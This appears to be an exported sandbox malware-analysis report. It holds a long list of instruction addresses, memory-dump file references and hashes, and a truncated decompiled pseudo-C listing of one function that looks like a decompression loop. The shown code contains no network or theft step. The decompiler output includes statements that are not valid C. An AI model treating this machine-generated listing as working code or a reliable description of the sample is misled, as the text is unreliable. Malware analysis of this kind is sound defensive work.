                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406956
                                                        0x00406958
                                                        0x0040695b
                                                        0x004069cc
                                                        0x004069cf
                                                        0x004069d2
                                                        0x004069d9
                                                        0x004069e3
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x0040695d
                                                        0x00406961
                                                        0x00406964
                                                        0x00406966
                                                        0x00406969
                                                        0x0040696c
                                                        0x0040696e
                                                        0x00406971
                                                        0x00406973
                                                        0x00406978
                                                        0x0040697b
                                                        0x0040697e
                                                        0x00406982
                                                        0x00406989
                                                        0x0040698c
                                                        0x00406993
                                                        0x00406997
                                                        0x0040699f
                                                        0x0040699f
                                                        0x0040699f
                                                        0x00406999
                                                        0x00406999
                                                        0x00406999
                                                        0x0040698e
                                                        0x0040698e
                                                        0x0040698e
                                                        0x004069a3
                                                        0x004069a6
                                                        0x004069c4
                                                        0x004069c6
                                                        0x00000000
                                                        0x004069a8
                                                        0x004069a8
                                                        0x004069ab
                                                        0x004069ae
                                                        0x004069b1
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b6
                                                        0x004069b9
                                                        0x004069bb
                                                        0x004069bc
                                                        0x004069bf
                                                        0x00000000
                                                        0x004069bf
                                                        0x00000000
                                                        0x00406bf5
                                                        0x00406bf9
                                                        0x00406c17
                                                        0x00406c1a
                                                        0x00406c21
                                                        0x00406c24
                                                        0x00406c27
                                                        0x00406c2a
                                                        0x00406c2d
                                                        0x00406c30
                                                        0x00406c32
                                                        0x00406c39
                                                        0x00406c3a
                                                        0x00406c3c
                                                        0x00406c3f
                                                        0x00406c42
                                                        0x00406c45
                                                        0x00406c45
                                                        0x00406c4a
                                                        0x00000000
                                                        0x00406c4a
                                                        0x00406bfb
                                                        0x00406bfe
                                                        0x00406c01
                                                        0x00406c0b
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406c5f
                                                        0x00406c63
                                                        0x00406c86
                                                        0x00406c89
                                                        0x00406c8c
                                                        0x00406c96
                                                        0x00406c65
                                                        0x00406c65
                                                        0x00406c68
                                                        0x00406c6b
                                                        0x00406c6e
                                                        0x00406c7b
                                                        0x00406c7e
                                                        0x00406c7e
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406ca2
                                                        0x00406ca6
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cac
                                                        0x00406cb0
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cb6
                                                        0x00406cb8
                                                        0x00406cbc
                                                        0x00406cbc
                                                        0x00406cbf
                                                        0x00406cc3
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d3a
                                                        0x00406d3e
                                                        0x00406d45
                                                        0x00406d48
                                                        0x00406d4b
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d4e
                                                        0x00406d51
                                                        0x00000000
                                                        0x00000000
                                                        0x00406dfa
                                                        0x00406dfa
                                                        0x00406dfe
                                                        0x0040719c
                                                        0x00000000
                                                        0x0040719c
                                                        0x00406e04
                                                        0x00406e07
                                                        0x00406e0a
                                                        0x00406e0e
                                                        0x00406e11
                                                        0x00406e17
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e1c
                                                        0x00406e1f
                                                        0x00000000
                                                        0x00000000
                                                        0x004069ef
                                                        0x004069ef
                                                        0x004069f3
                                                        0x00407160
                                                        0x00000000
                                                        0x00407160
                                                        0x004069f9
                                                        0x004069fc
                                                        0x004069ff
                                                        0x00406a03
                                                        0x00406a06
                                                        0x00406a0c
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a11
                                                        0x00406a14
                                                        0x00406a14
                                                        0x00406a17
                                                        0x00406a1a
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a20
                                                        0x00406a26
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a2c
                                                        0x00406a2c
                                                        0x00406a30
                                                        0x00406a33
                                                        0x00406a36
                                                        0x00406a39
                                                        0x00406a3c
                                                        0x00406a3d
                                                        0x00406a40
                                                        0x00406a42
                                                        0x00406a48
                                                        0x00406a4b
                                                        0x00406a4e
                                                        0x00406a51
                                                        0x00406a54
                                                        0x00406a57
                                                        0x00406a5a
                                                        0x00406a76
                                                        0x00406a79
                                                        0x00406a7c
                                                        0x00406a7f
                                                        0x00406a86
                                                        0x00406a8a
                                                        0x00406a8c
                                                        0x00406a90
                                                        0x00406a5c
                                                        0x00406a5c
                                                        0x00406a60
                                                        0x00406a68
                                                        0x00406a6d
                                                        0x00406a6f
                                                        0x00406a71
                                                        0x00406a71
                                                        0x00406a93
                                                        0x00406a9a
                                                        0x00406a9d
                                                        0x00000000
                                                        0x00406aa3
                                                        0x00000000
                                                        0x00406aa3
                                                        0x00000000
                                                        0x00406aa8
                                                        0x00406aa8
                                                        0x00406aac
                                                        0x0040716c
                                                        0x00000000
                                                        0x0040716c
                                                        0x00406ab2
                                                        0x00406ab5
                                                        0x00406ab8
                                                        0x00406abc
                                                        0x00406abf
                                                        0x00406ac5
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406aca
                                                        0x00406acd
                                                        0x00406acd
                                                        0x00406acd
                                                        0x00406ad3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406ad5
                                                        0x00406ad8
                                                        0x00406adb
                                                        0x00406ade
                                                        0x00406ae1
                                                        0x00406ae4
                                                        0x00406ae7
                                                        0x00406aea
                                                        0x00406aed
                                                        0x00406af0
                                                        0x00406af3
                                                        0x00406b0b
                                                        0x00406b0e
                                                        0x00406b11
                                                        0x00406b14
                                                        0x00406b14
                                                        0x00406b17
                                                        0x00406b1b
                                                        0x00406b1d
                                                        0x00406af5
                                                        0x00406af5
                                                        0x00406afd
                                                        0x00406b02
                                                        0x00406b04
                                                        0x00406b06
                                                        0x00406b06
                                                        0x00406b20
                                                        0x00406b27
                                                        0x00406b2a
                                                        0x00000000
                                                        0x00406b2c
                                                        0x00000000
                                                        0x00406b2c
                                                        0x00406b2a
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b6c
                                                        0x00406b6c
                                                        0x00406b70
                                                        0x00407178
                                                        0x00000000
                                                        0x00407178
                                                        0x00406b76
                                                        0x00406b79
                                                        0x00406b7c
                                                        0x00406b80
                                                        0x00406b83
                                                        0x00406b89
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8e
                                                        0x00406b91
                                                        0x00406b91
                                                        0x00406b97
                                                        0x00406b35
                                                        0x00406b35
                                                        0x00406b38
                                                        0x00000000
                                                        0x00406b38
                                                        0x00406b99
                                                        0x00406b99
                                                        0x00406b9c
                                                        0x00406b9f
                                                        0x00406ba2
                                                        0x00406ba5
                                                        0x00406ba8
                                                        0x00406bab
                                                        0x00406bae
                                                        0x00406bb1
                                                        0x00406bb4
                                                        0x00406bb7
                                                        0x00406bcf
                                                        0x00406bd2
                                                        0x00406bd5
                                                        0x00406bd8
                                                        0x00406bd8
                                                        0x00406bdb
                                                        0x00406bdf
                                                        0x00406be1
                                                        0x00406bb9
                                                        0x00406bb9
                                                        0x00406bc1
                                                        0x00406bc6
                                                        0x00406bc8
                                                        0x00406bca
                                                        0x00406bca
                                                        0x00406be4
                                                        0x00406beb
                                                        0x00406bee
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00000000
                                                        0x00406e7d
                                                        0x00406e7d
                                                        0x00406e81
                                                        0x004071a8
                                                        0x00000000
                                                        0x004071a8
                                                        0x00406e87
                                                        0x00406e8a
                                                        0x00406e8d
                                                        0x00406e91
                                                        0x00406e94
                                                        0x00406e9a
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f8c
                                                        0x00406f90
                                                        0x00406fb2
                                                        0x00406fb5
                                                        0x00406fbf
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406f92
                                                        0x00406f95
                                                        0x00406f99
                                                        0x00406f9c
                                                        0x00406f9c
                                                        0x00406f9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00407049
                                                        0x0040704d
                                                        0x0040706b
                                                        0x0040706b
                                                        0x0040706b
                                                        0x00407072
                                                        0x00407079
                                                        0x00407080
                                                        0x00407080
                                                        0x00000000
                                                        0x00407080
                                                        0x0040704f
                                                        0x00407052
                                                        0x00407055
                                                        0x00407058
                                                        0x0040705f
                                                        0x00406fa3
                                                        0x00406fa3
                                                        0x00406fa6
                                                        0x00000000
                                                        0x00000000
                                                        0x0040713a
                                                        0x0040713d
                                                        0x0040703e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d74
                                                        0x00406d76
                                                        0x00406d7d
                                                        0x00406d7e
                                                        0x00406d80
                                                        0x00406d83
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d8b
                                                        0x00406d8e
                                                        0x00406d91
                                                        0x00406d93
                                                        0x00406d95
                                                        0x00406d95
                                                        0x00406d96
                                                        0x00406d99
                                                        0x00406da0
                                                        0x00406da3
                                                        0x00406db1
                                                        0x00000000
                                                        0x00000000
                                                        0x00407087
                                                        0x00407087
                                                        0x0040708a
                                                        0x00407091
                                                        0x00000000
                                                        0x00000000
                                                        0x00407096
                                                        0x00407096
                                                        0x0040709a
                                                        0x004071d2
                                                        0x00000000
                                                        0x004071d2
                                                        0x004070a0
                                                        0x004070a3
                                                        0x004070a6
                                                        0x004070aa
                                                        0x004070ad
                                                        0x004070b3
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b8
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070be
                                                        0x004070be
                                                        0x004070c2
                                                        0x00407122
                                                        0x00407125
                                                        0x0040712a
                                                        0x0040712b
                                                        0x0040712d
                                                        0x0040712f
                                                        0x00407132
                                                        0x0040703e
                                                        0x0040703e
                                                        0x00000000
                                                        0x00407044
                                                        0x0040703e
                                                        0x004070c4
                                                        0x004070ca
                                                        0x004070cd
                                                        0x004070d0
                                                        0x004070d3
                                                        0x004070d6
                                                        0x004070d9
                                                        0x004070dc
                                                        0x004070df
                                                        0x004070e2
                                                        0x004070e5
                                                        0x004070fe
                                                        0x00407101
                                                        0x00407104
                                                        0x00407107
                                                        0x0040710b
                                                        0x0040710d
                                                        0x0040710d
                                                        0x0040710e
                                                        0x00407111
                                                        0x004070e7
                                                        0x004070e7
                                                        0x004070ef
                                                        0x004070f4
                                                        0x004070f6
                                                        0x004070f9
                                                        0x004070f9
                                                        0x00407114
                                                        0x0040711b
                                                        0x00000000
                                                        0x0040711d
                                                        0x00000000
                                                        0x0040711d
                                                        0x00000000
                                                        0x00406db9
                                                        0x00406dbc
                                                        0x00406df2
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f25
                                                        0x00406f25
                                                        0x00406f28
                                                        0x00406f2a
                                                        0x004071b4
                                                        0x00000000
                                                        0x004071b4
                                                        0x00406f30
                                                        0x00406f33
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f39
                                                        0x00406f3d
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00000000
                                                        0x00406f40
                                                        0x00406dbe
                                                        0x00406dc0
                                                        0x00406dc2
                                                        0x00406dc4
                                                        0x00406dc7
                                                        0x00406dc8
                                                        0x00406dca
                                                        0x00406dcc
                                                        0x00406dcf
                                                        0x00406dd2
                                                        0x00406de8
                                                        0x00406ded
                                                        0x00406e25
                                                        0x00406e25
                                                        0x00406e29
                                                        0x00406e55
                                                        0x00406e57
                                                        0x00406e5e
                                                        0x00406e61
                                                        0x00406e64
                                                        0x00406e64
                                                        0x00406e69
                                                        0x00406e69
                                                        0x00406e6b
                                                        0x00406e6e
                                                        0x00406e75
                                                        0x00406e78
                                                        0x00406ea5
                                                        0x00406ea5
                                                        0x00406ea8
                                                        0x00406eab
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00000000
                                                        0x00406f1f
                                                        0x00406ead
                                                        0x00406eb3
                                                        0x00406eb6
                                                        0x00406eb9
                                                        0x00406ebc
                                                        0x00406ebf
                                                        0x00406ec2
                                                        0x00406ec5
                                                        0x00406ec8
                                                        0x00406ecb
                                                        0x00406ece
                                                        0x00406ee7
                                                        0x00406ee9
                                                        0x00406eec
                                                        0x00406eed
                                                        0x00406ef0
                                                        0x00406ef2
                                                        0x00406ef5
                                                        0x00406ef7
                                                        0x00406ef9
                                                        0x00406efc
                                                        0x00406efe
                                                        0x00406f01
                                                        0x00406f05
                                                        0x00406f07
                                                        0x00406f07
                                                        0x00406f08
                                                        0x00406f0b
                                                        0x00406f0e
                                                        0x00406ed0
                                                        0x00406ed0
                                                        0x00406ed8
                                                        0x00406edd
                                                        0x00406edf
                                                        0x00406ee2
                                                        0x00406ee2
                                                        0x00406f11
                                                        0x00406f18
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00406f18
                                                        0x00406e2b
                                                        0x00406e2e
                                                        0x00406e30
                                                        0x00406e33
                                                        0x00406e36
                                                        0x00406e39
                                                        0x00406e3b
                                                        0x00406e3e
                                                        0x00406e41
                                                        0x00406e41
                                                        0x00406e44
                                                        0x00406e44
                                                        0x00406e47
                                                        0x00406e4e
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00000000
                                                        0x00406e50
                                                        0x00000000
                                                        0x00406e50
                                                        0x00406e4e
                                                        0x00406dd4
                                                        0x00406dd7
                                                        0x00406dd9
                                                        0x00406ddc
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b3b
                                                        0x00406b3b
                                                        0x00406b3f
                                                        0x00407184
                                                        0x00000000
                                                        0x00407184
                                                        0x00406b45
                                                        0x00406b48
                                                        0x00406b4b
                                                        0x00406b4e
                                                        0x00406b51
                                                        0x00406b54
                                                        0x00406b57
                                                        0x00406b59
                                                        0x00406b5c
                                                        0x00406b5f
                                                        0x00406b62
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cc6
                                                        0x00406cc6
                                                        0x00406cca
                                                        0x00407190
                                                        0x00000000
                                                        0x00407190
                                                        0x00406cd0
                                                        0x00406cd3
                                                        0x00406cd6
                                                        0x00406cd9
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cde
                                                        0x00406ce1
                                                        0x00406ce4
                                                        0x00406ce7
                                                        0x00406cea
                                                        0x00406ced
                                                        0x00406cee
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf3
                                                        0x00406cf6
                                                        0x00406cf9
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cff
                                                        0x00406d01
                                                        0x00406d01
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f47
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f4d
                                                        0x00406f50
                                                        0x00406f53
                                                        0x00406f56
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f5b
                                                        0x00406f5e
                                                        0x00406f61
                                                        0x00406f64
                                                        0x00406f67
                                                        0x00406f6a
                                                        0x00406f6b
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f70
                                                        0x00406f73
                                                        0x00406f76
                                                        0x00406f79
                                                        0x00406f7c
                                                        0x00406f80
                                                        0x00406f82
                                                        0x00406f85
                                                        0x00000000
                                                        0x00406f87
                                                        0x00406d04
                                                        0x00406d04
                                                        0x00000000
                                                        0x00406d04
                                                        0x00406f85
                                                        0x004071ba
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e9
                                                        0x004071f1
                                                        0x004071f1
                                                        0x00000000
                                                        0x004071f1
                                                        0x0040703e
                                                        0x00406fc5
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406d17

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                                        • Instruction ID: 95b660950287b107d15ca963a4456fab735294b344fdd2f3256912a70e30144d
                                                        • Opcode Fuzzy Hash: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                                        • Instruction Fuzzy Hash: A4713371E04228DBDF28CF98C844BADBBB1FF44305F15806AD856BB280C7789996DF45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406C5F Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 98%
                                                        			E00406C5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004071F9))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4)); // executed
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
